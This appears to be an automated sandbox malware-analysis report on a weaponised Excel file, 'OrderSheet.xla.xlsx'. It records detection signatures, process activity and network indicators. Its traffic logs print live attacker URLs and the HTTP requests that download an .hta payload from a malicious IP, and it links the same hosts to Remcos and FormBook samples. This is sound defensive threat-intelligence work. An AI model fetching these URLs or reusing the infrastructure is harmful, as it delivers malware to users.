Windows Analysis Report
OrderSheet.xla.xlsx

Overview

General Information

Sample name: OrderSheet.xla.xlsx
Analysis ID: 1572118
MD5: f11d4f4a1c4b40a38a0d32a65b464853
SHA1: 0bf28b871d1169fbbe565cf18b032f55f0479cae
SHA256: 57d8d4a52a8ae466a911161272b5416bff18784c91fcf631e193a2cbc4376920
Tags: xla, xlsx, user-abuse_ch

Detection

Score: 68
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Document exploit detected (process start blacklist hit)
Excel sheet contains many unusual embedded objects
Machine Learning detection for sample
Document contains embedded VBA macros
Document embeds suspicious OLE2 link
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Excel Network Connections
Sigma detected: Suspicious Office Outbound Connections
Unable to load, office file is protected or invalid
Uses a known web browser user agent for HTTP communication

Classification

  • System is w10x64
  • EXCEL.EXE (PID: 7404 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding MD5: 4A871771235598812032C822E6F68F19)
    • Acrobat.exe (PID: 8144 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" -Embedding MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
      • AcroCEF.exe (PID: 6608 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
        • AcroCEF.exe (PID: 7240 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2060 --field-trial-handle=1596,i,13638127103217919502,6718479426276192951,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
    • splwow64.exe (PID: 3720 cmdline: C:\Windows\splwow64.exe 12288 MD5: 77DE7761B037061C7C112FD3C5B91E73)
    • splwow64.exe (PID: 2876 cmdline: C:\Windows\splwow64.exe 12288 MD5: 77DE7761B037061C7C112FD3C5B91E73)
    • splwow64.exe (PID: 6484 cmdline: C:\Windows\splwow64.exe 12288 MD5: 77DE7761B037061C7C112FD3C5B91E73)
  • EXCEL.EXE (PID: 2672 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\OrderSheet.xla.xlsx" MD5: 4A871771235598812032C822E6F68F19)
  • cleanup
No configs have been found
No yara matches

System Summary

Source: Network Connection | Author: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0', Tim Shelton | Data: DestinationIp: 54.150.207.131, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, Initiated: true, ProcessId: 7404, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49814
Source: Network Connection | Author: X__Junior (Nextron Systems) | Data: DestinationIp: 192.168.2.5, DestinationIsIpv6: false, DestinationPort: 49814, EventID: 3, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, Initiated: true, ProcessId: 7404, Protocol: tcp, SourceIp: 54.150.207.131, SourceIsIpv6: false, SourcePort: 443
No Suricata rule has matched

AV Detection

Source: https://short.ruksk.com/2ZPt3M?&chance=wealthy&guide=encouraging&president=aloof&conductor=cute&beverage | Avira URL Cloud: Label: malware
Source: OrderSheet.xla.xlsx | ReversingLabs: Detection: 18%
Source: OrderSheet.xla.xlsx | Virustotal: Detection: 11%
Source: OrderSheet.xla.xlsx | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE | File opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dll
Source: unknown | HTTPS traffic detected: 54.150.207.131:443 -> 192.168.2.5:49814 version: TLS 1.2

Software Vulnerabilities

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE | Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
Source: global traffic | DNS query: name: short.ruksk.com
Source: global traffic | DNS query: name: x1.i.lencr.org
Source: global traffic | TCP traffic: 192.168.2.5:49814 -> 54.150.207.131:443
Source: global traffic | TCP traffic: 192.168.2.5:49820 -> 172.245.123.29:80
Source: global traffic | TCP traffic: 54.150.207.131:443 -> 192.168.2.5:49814
Source: global traffic | TCP traffic: 172.245.123.29:80 -> 192.168.2.5:49820
Source: excel.exe | Memory has grown: Private usage: 2MB later: 75MB
Source: Joe Sandbox View | IP Address: 54.150.207.131 54.150.207.131
Source: Joe Sandbox View | JA3 fingerprint: 6271f898ce5be7dd52b0fc260d0662b3
Source: global traffic | HTTP traffic detected:
  GET /2ZPt3M?&chance=wealthy&guide=encouraging&president=aloof&conductor=cute&beverage HTTP/1.1
  Accept: */*
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
  Host: short.ruksk.com
  Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
  GET /221/wcc/shewithmegoodthingstogetmebackwithentirelifeiloveherwithheart.hta HTTP/1.1
  Accept: */*
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
  Connection: Keep-Alive
  Host: 172.245.123.29
Source: unknown | TCP traffic detected without corresponding DNS query: 172.245.123.29
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: short.ruksk.com
Source: global traffic | DNS traffic detected: DNS query: x1.i.lencr.org
Source: global traffic | HTTP traffic detected:
  HTTP/1.1 404 Not Found
  Date: Tue, 10 Dec 2024 05:48:33 GMT
  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25
  Content-Length: 300
  Keep-Alive: timeout=5, max=100
  Connection: Keep-Alive
  Content-Type: text/html; charset=iso-8859-1
  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25 Server at 172.245.123.29 Port 80</address></body></html>
Source: 57C8EDB95DF3F0AD4EE2DC2B8CFD41570.0.dr | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab
Source: 2D85F72862B55C4EADD9E66E06947F3D0.6.dr | String found in binary or memory: http://x1.i.lencr.org/
Source: unknown | Network traffic detected: HTTP traffic on port 49814 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49814

System Summary

Source: OrderSheet.xla.xlsx | OLE: Microsoft Excel 2007+
Source: FA440000.0.dr | OLE: Microsoft Excel 2007+
Source: OrderSheet.xla.xlsx | OLE indicator, VBA macros: true
Source: FA440000.0.dr | OLE indicator, VBA macros: true
Source: OrderSheet.xla.xlsx | Stream path 'MBD00016417/\x1Ole' : https://short.ruksk.com/2ZPt3M?&chance=wealthy&guide=encouraging&president=aloof&conductor=cute&beverageB^pgnTtYj9obRPn04l0eylXGdmd1ffbGeoszYT3wJO1XUb3Ydl2eT2CuW7ERCfZu4U5TkcZrkeEhgEjSbrSecY4NIzqKrPALF3MX0Ghtg2wAoXhwYjFrHjboV6MNduekwBYXg9nRbeH6qKsqZ9DSAdXfFwJEMikiZVNvwXtQGVPphhVgEgyA9VjN3wAj}#A*RCLZYLSU!*
Source: FA440000.0.dr | Stream path 'MBD00016417/\x1Ole' : https://short.ruksk.com/2ZPt3M?&chance=wealthy&guide=encouraging&president=aloof&conductor=cute&beverageB^pgnTtYj9obRPn04l0eylXGdmd1ffbGeoszYT3wJO1XUb3Ydl2eT2CuW7ERCfZu4U5TkcZrkeEhgEjSbrSecY4NIzqKrPALF3MX0Ghtg2wAoXhwYjFrHjboV6MNduekwBYXg9nRbeH6qKsqZ9DSAdXfFwJEMikiZVNvwXtQGVPphhVgEgyA9VjN3wAj}#A*RCLZYLSU!*
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE | Window title found: microsoft excel okexcel cannot open the file 'ordersheet.xla.xlsx' because the file format or file extension is not valid. verify that the file has not been corrupted and that the file extension matches the format of the file.
Source: classification engine | Classification label: mal68.expl.winXLSX@22/73@2/2
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE | File created: C:\Program Files (x86)\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xml
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE | File created: C:\Users\user\Desktop\~$OrderSheet.xla.xlsx
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Temp\{317C6E6B-A3B7-4AAB-8683-14674C86DB7B} - OProcSessId.dat
Source: OrderSheet.xla.xlsx | OLE indicator, Workbook stream: true
Source: FA440000.0.dr | OLE indicator, Workbook stream: true
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE | File read: C:\Users\desktop.ini
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: unknown | Process created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE | Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" -Embedding
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe | Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE | Process created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe | Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2060 --field-trial-handle=1596,i,13638127103217919502,6718479426276192951,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Source: unknown | Process created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\OrderSheet.xla.xlsx"
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe | Process created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe | Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3EE60F5C-9BAD-4CD8-8E21-AD2D001D06EB}\InprocServer32
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common
Source: OrderSheet.xla.xlsx | Static file information: File size 1071616 > 1048576
Source: OrderSheet.xla.xlsx | Initial sample: OLE indicators encrypted = True
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\splwow64.exe | Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: OrderSheet.xla.xlsx | Stream path 'MBD00016416/MBD007203CB/Workbook' entropy: 7.97416832031 (max. 8.0)
Source: OrderSheet.xla.xlsx | Stream path 'Workbook' entropy: 7.99869339941 (max. 8.0)
Source: FA440000.0.dr | Stream path 'MBD00016416/MBD007203CB/Workbook' entropy: 7.97416832031 (max. 8.0)
Source: FA440000.0.dr | Stream path 'Workbook' entropy: 7.9867467551 (max. 8.0)
Source: C:\Windows\splwow64.exe | Window / User API: threadDelayed 525
Source: C:\Windows\splwow64.exe | Last function: Thread delayed
Source: C:\Windows\splwow64.exe | Thread delayed: delay time: 120000
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE | Process information queried: ProcessInformation
  • Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information
  • Resource Development: 1 Scripting; Domains; DNS Server; Virtual Private Server; Server
  • Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts
  • Execution: 13 Exploitation for Client Execution; Scheduled Task/Job; At; Cron; Launchd
  • Persistence: 1 Scripting; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script
  • Privilege Escalation: 1 Process Injection; 1 Extra Window Memory Injection; Logon Script (Windows); Login Hook; Network Logon Script
  • Defense Evasion: 2 Masquerading; 1 Virtualization/Sandbox Evasion; 1 Process Injection; 1 Obfuscated Files or Information; 1 Extra Window Memory Injection
  • Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets
  • Discovery: 1 Process Discovery; 1 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 1 File and Directory Discovery; 2 System Information Discovery
  • Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH
  • Collection: Data from Local System; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging
  • Command and Control: 1 Encrypted Channel; 3 Ingress Tool Transfer; 3 Non-Application Layer Protocol; 14 Application Layer Protocol; Fallback Channels
  • Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer
  • Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact
Behavior Graph ID: 1572118, Sample: OrderSheet.xla.xlsx, Startdate: 10/12/2024, Architecture: WINDOWS, Score: 68
  • DNS/IP: x1.i.lencr.org, short.ruksk.com, bg.microsoft.map.fastly.net
  • Signatures: Antivirus detection for URL or domain; Multi AV Scanner detection for submitted file; Excel sheet contains many unusual embedded objects; 2 other signatures
  • Processes started: EXCEL.EXE and a second EXCEL.EXE
  • EXCEL.EXE DNS/IP: 172.245.123.29, 49820, 80 (AS-COLOCROSSINGUS, United States); short.ruksk.com 54.150.207.131, 443, 49814 (AMAZON-02US, United States)
  • EXCEL.EXE dropped: C:\Users\user\Desktop\~$OrderSheet.xla.xlsx, data
  • EXCEL.EXE started: Acrobat.exe and three splwow64.exe processes
  • Acrobat.exe started AcroCEF.exe, which started a further AcroCEF.exe

Source | Detection | Scanner | Label
OrderSheet.xla.xlsx | 18% | ReversingLabs |
OrderSheet.xla.xlsx | 11% | Virustotal |
OrderSheet.xla.xlsx | 100% | Joe Sandbox ML |
No Antivirus matches
Source | Detection | Scanner | Label
https://short.ruksk.com/2ZPt3M?&chance=wealthy&guide=encouraging&president=aloof&conductor=cute&beverage | 100% | Avira URL Cloud | malware
Name | IP | Active | Malicious | Antivirus Detection | Reputation
mira-tmc.tm-4.office.com | 52.123.243.178 | true | false | | high
bg.microsoft.map.fastly.net | 199.232.210.172 | true | false | | high
s-part-0035.t-0009.t-msedge.net | 13.107.246.63 | true | false | | high
short.ruksk.com | 54.150.207.131 | true | false | | high
x1.i.lencr.org | unknown | unknown | false | | high
Name | Malicious | Antivirus Detection | Reputation
https://short.ruksk.com/2ZPt3M?&chance=wealthy&guide=encouraging&president=aloof&conductor=cute&beverage | false | Avira URL Cloud: malware | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://x1.i.lencr.org/ | 2D85F72862B55C4EADD9E66E06947F3D0.6.dr | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
172.245.123.29 | unknown | United States | 36352 | AS-COLOCROSSINGUS | false
54.150.207.131 | short.ruksk.com | United States | 16509 | AMAZON-02US | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1572118
Start date and time: 2024-12-10 06:46:42 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 5m 5s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name: Potential for more IOCs and behavior
Number of analysed new started processes analysed: 17
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
  • HCA enabled
  • EGA enabled
  • GSI enabled (VBA)
  • AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: OrderSheet.xla.xlsx
Detection: MAL
Classification: mal68.expl.winXLSX@22/73@2/2
EGA Information: Failed
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 0
  • Number of non-executed functions: 0
Cookbook Comments:
  • Found application associated with file extension: .xlsx
  • Changed system and user locale, location and keyboard layout to French - France
  • Found Word or Excel or PowerPoint or XPS Viewer
  • Attach to Office via COM
  • Active ActiveX Object
  • Active ActiveX Object
  • Active ActiveX Object
  • Scroll down
  • Close Viewer
  • Exclude process from analysis (whitelisted): dllhost.exe, sppsvc.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size getting too big, too many NtCreateKey calls found.
  • Report size getting too big, too many NtQueryAttributesFile calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
  • Report size getting too big, too many NtReadVirtualMemory calls found.
Time | Type | Description
00:48:40 | API Interceptor | 567x Sleep call for process: splwow64.exe modified
00:48:50 | API Interceptor | 1x Sleep call for process: AcroCEF.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
172.245.123.29 | seemybestdayguvenu.hta | malicious | Cobalt Strike, FormBook, HTMLPhisher | 172.245.123.29/770/CAMCA.txt
172.245.123.29 | seemebestthings.hta | malicious | Cobalt Strike, HTMLPhisher | 172.245.123.29/1343/seemebestthingswithentirethingswithgreatnaturethings.tIF
172.245.123.29 | Swiftcopy.xla.xlsx | malicious | HTMLPhisher | 172.245.123.29/1343/seemebestthingswithentirethingswithgreatnaturethings.tIF
54.150.207.131 | Potvrda_o_uplati.docx.doc | malicious | Unknown |
54.150.207.131 | FR65 380 071 464.docx | malicious | Unknown |
54.150.207.131 | FR65 380 071 464.docx | malicious | Unknown |
54.150.207.131 | Document.xla.xlsx | malicious | FormBook, HTMLPhisher |
54.150.207.131 | Amoxycillin Trihydrate Powder.docx.doc | malicious | Remcos |
54.150.207.131 | #U041f#U043b#U0430#U0449#U0430#U043d#U0435.docx | malicious | Remcos |
54.150.207.131 | 0200011080.xls | malicious | Remcos, HTMLPhisher |
Match | Associated Sample Name / URL | Detection | Threat Name | Context
short.ruksk.com | Potvrda_o_uplati.docx.doc | malicious | Unknown | 54.150.207.131
short.ruksk.com | FR65 380 071 464.docx | malicious | Unknown | 54.150.207.131
short.ruksk.com | Document.xla.xlsx | malicious | FormBook, HTMLPhisher | 54.150.207.131
short.ruksk.com | Amoxycillin Trihydrate Powder.docx.doc | malicious | Remcos | 54.150.207.131
short.ruksk.com | #U041f#U043b#U0430#U0449#U0430#U043d#U0435.docx | malicious | Remcos | 54.150.207.131
short.ruksk.com | 0200011080.xls | malicious | Remcos, HTMLPhisher | 54.150.207.131
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):118
                            Entropy (8bit):3.5700810731231707
                            Encrypted:false
                            SSDEEP:3:QaklTlAlXMLLmHlIlFLlmIK/5lTn84vlJlhlXlDHlA6l3l6Als:QFulcLk04/5p8GVz6QRq
                            MD5:573220372DA4ED487441611079B623CD
                            SHA1:8F9D967AC6EF34640F1F0845214FBC6994C0CB80
                            SHA-256:BE84B842025E4241BFE0C9F7B8F86A322E4396D893EF87EA1E29C74F47B6A22D
                            SHA-512:F19FA3583668C3AF92A9CEF7010BD6ECEC7285F9C8665F2E9528DBA606F105D9AF9B1DB0CF6E7F77EF2E395943DC0D5CB37149E773319078688979E4024F9DD7
                            Malicious:false
                            Reputation:high, very likely benign file
                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.H.e.a.r.t.b.e.a.t.C.a.c.h.e./.>.
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                            File Type:ASCII text
                            Category:dropped
                            Size (bytes):294
                            Entropy (8bit):5.124999135769634
                            Encrypted:false
                            SSDEEP:6:7pv99+q2P92nKuAl9OmbnIFUt8O4XJZmw+O4X9VkwO92nKuAl9OmbjLJ:7pWv4HAahFUt8O45/+O4T5LHAaSJ
                            MD5:8790A2DD16458F51DBEB04716E804B44
                            SHA1:40AE833D38A42381DE6119E6AFC26548E71DD892
                            SHA-256:79A487207855B28AA5C9ACE88B29E8C722A5C7A23BA4E344732331D4F91662A6
                            SHA-512:80938D33DA7C8E279ACCC64A7750E095AF6769D9ED864CADE27C80836BCD715DEE309A31A349868BA355F56D6D75C3EC3E142AC83FC7CC3189919D584E25E9A0
                            Malicious:false
                            Preview:2024/12/10-00:48:40.709 1808 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/12/10-00:48:40.711 1808 Recovering log #3.2024/12/10-00:48:40.711 1808 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                            File Type:ASCII text
                            Category:dropped
                            Size (bytes):338
                            Entropy (8bit):5.145019763902111
                            Encrypted:false
                            SSDEEP:6:7SVq2P92nKuAl9Ombzo2jMGIFUt8OejZmw+Oe5kwO92nKuAl9Ombzo2jMmLJ:74v4HAa8uFUt8Oo/+Ow5LHAa8RJ
                            MD5:04181994EAEB47676E5E356D059344CD
                            SHA1:26DB4EEB4A89E2A002B1B4876ACA2A085AE6D55C
                            SHA-256:C069EE9C5D6FA069EAB30F61E48F108B85F2180B8C9589034D92E3183BF0F4CF
                            SHA-512:BC86E844A76634EFA8C9E41E7D951EBEEE80684C59337B8ED8AB8CB540E3A528902A2B9284A9630523AEB22B80DB97066F0CB9656F3ED6EA547F801AAB0401F0
                            Malicious:false
                            Preview:2024/12/10-00:48:40.773 1b90 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/12/10-00:48:40.774 1b90 Recovering log #3.2024/12/10-00:48:40.774 1b90 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                            File Type:JSON data
                            Category:dropped
                            Size (bytes):508
                            Entropy (8bit):5.047195090775108
                            Encrypted:false
                            SSDEEP:12:YH/um3RA8sqnT/sBdOg2HXcaq3QYiubxnP7E4TfF+:Y2sRdsgTAdMHW3QYhbxP7np+
                            MD5:70321A46A77A3C2465E2F031754B3E06
                            SHA1:5E7E713285D36F12ACFC68A34D8A34FD33C96B34
                            SHA-256:344DA48DA0F9A5CC258E10D6C28086B7718CBE596CDC3D7A2A61C8F5FD781248
                            SHA-512:E885342B270FE3D538F17F8F80B9ED061B30EE55624177BD81F5C65C033160D71559D60872BC0F99C0C93FAE29F9D09FD5042B68D83CD538154D1335BAC8205D
                            Malicious:false
                            Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13340988966329963","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":144691},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.5","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G","CAYSABiAgICA+P////8B":"Offline"}}}
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                            File Type:JSON data
                            Category:modified
                            Size (bytes):508
                            Entropy (8bit):5.055214842588389
                            Encrypted:false
                            SSDEEP:12:YH/um3RA8sqcsBdOg2HrCcaq3QYiubxnP7E4TfF+:Y2sRdsIdMHrN3QYhbxP7np+
                            MD5:D879FBA102A95CE004AC5AD399105C37
                            SHA1:B1E8472E7A42E879878E9D70CF24AC252FEF89C6
                            SHA-256:DBE2D814C019A20233DDB96DDFAA95AD459CD4CED252956F286138A21DD9E520
                            SHA-512:48B4CF0F00CC0D316B0CC4B991601206E9422D16417034D5126EBC1268E25DED2ABFEB59BA29E198D52BCA9A2C4475A9696FADF836D0871B1BFAD2D695F366E9
                            Malicious:false
                            Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13378369732609841","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":588841},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.5","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G","CAYSABiAgICA+P////8B":"Offline"}}}
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):4509
                            Entropy (8bit):5.233345668046924
                            Encrypted:false
                            SSDEEP:96:QqBpCqGp3Al+NehBmkID2w6bNMhugoKTNY+No/KTNcygLPGLLUBleaV2hoq67KZ:rBpJGp3AoqBmki25ZEVoKTNY+NoCTNL5
                            MD5:FE0BBD8A415FAE79A31FA32F15F70C25
                            SHA1:D7C0FF93E78892F12F6F1BFFE4A24E68DF554F99
                            SHA-256:02E1E0CE927509C418F60194D47F7822CB4E5FCF65BBCC708AF9A678CB75AA11
                            SHA-512:8FBB8A77CBC8A97F46254A3C43F33EDC000ACB388AA2880AC77D697AD2A15110A2ABE8FB0956A95BB007836C562F3735FC2ADD9260A7F5E63C613C743A1C563A
                            Malicious:false
                            Preview:*...#................version.1..namespace-.1a.o................next-map-id.1.Pnamespace-047a745d_5c98_4926_b446_942fb948d072-https://rna-resource.acrobat.com/.0.K..r................next-map-id.2.Snamespace-bdf2fbfe_e08b_407d_8a81_9a6094e373a0-https://rna-v2-resource.acrobat.com/.1.m.Fr................next-map-id.3.Snamespace-24b9c7f4_3e31_4d11_a607_ac91d6485c9e-https://rna-v2-resource.acrobat.com/.2.8.o................next-map-id.4.Pnamespace-bc60f291_faa7_4492_8b22_e186b4ce62c1-https://rna-resource.acrobat.com/.3.A-N^...............Pnamespace-047a745d_5c98_4926_b446_942fb948d072-https://rna-resource.acrobat.com/-j..^...............Pnamespace-bc60f291_faa7_4492_8b22_e186b4ce62c1-https://rna-resource.acrobat.com/[.|.a...............Snamespace-bdf2fbfe_e08b_407d_8a81_9a6094e373a0-https://rna-v2-resource.acrobat.com/....a...............Snamespace-24b9c7f4_3e31_4d11_a607_ac91d6485c9e-https://rna-v2-resource.acrobat.com/.W.@o................next-map-id.5.Pnamespace-8fb46ac3_c992_47ca_bb04_
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                            File Type:ASCII text
                            Category:dropped
                            Size (bytes):326
                            Entropy (8bit):5.164826831152883
                            Encrypted:false
